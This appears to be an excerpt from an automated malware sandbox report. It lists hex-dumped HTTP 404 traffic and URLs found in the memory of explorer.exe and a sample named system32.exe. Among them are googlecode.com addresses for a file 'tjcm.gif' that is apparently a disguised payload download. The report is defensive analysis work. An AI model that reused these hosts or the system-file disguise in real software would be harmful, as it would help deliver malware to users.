31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/al
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif&
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif7
                          Source: explorer.exe, 00000005.00000002.3380482241.00000000012C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif;R
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifJ
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifc
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifmes
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif&
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif8
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifE
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifL
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifS
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif_
                          Source: explorer.exe, 00000005.00000002.3380482241.0000000001307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifbs_cw5n1h2txyewy
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.giff
                          Source: explorer.exe, 00000005.00000002.3380482241.0000000001284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifjjQe
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifz
                          Source: explorer.exe, 00000005.00000002.3380482241.0000000001307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/filesxeient.CBS_cw5n1h2txyewy
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/A
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif&
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif-00AA004BA90B
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifN
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifg
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifh
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gift
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gify
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/i.dll
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19LR
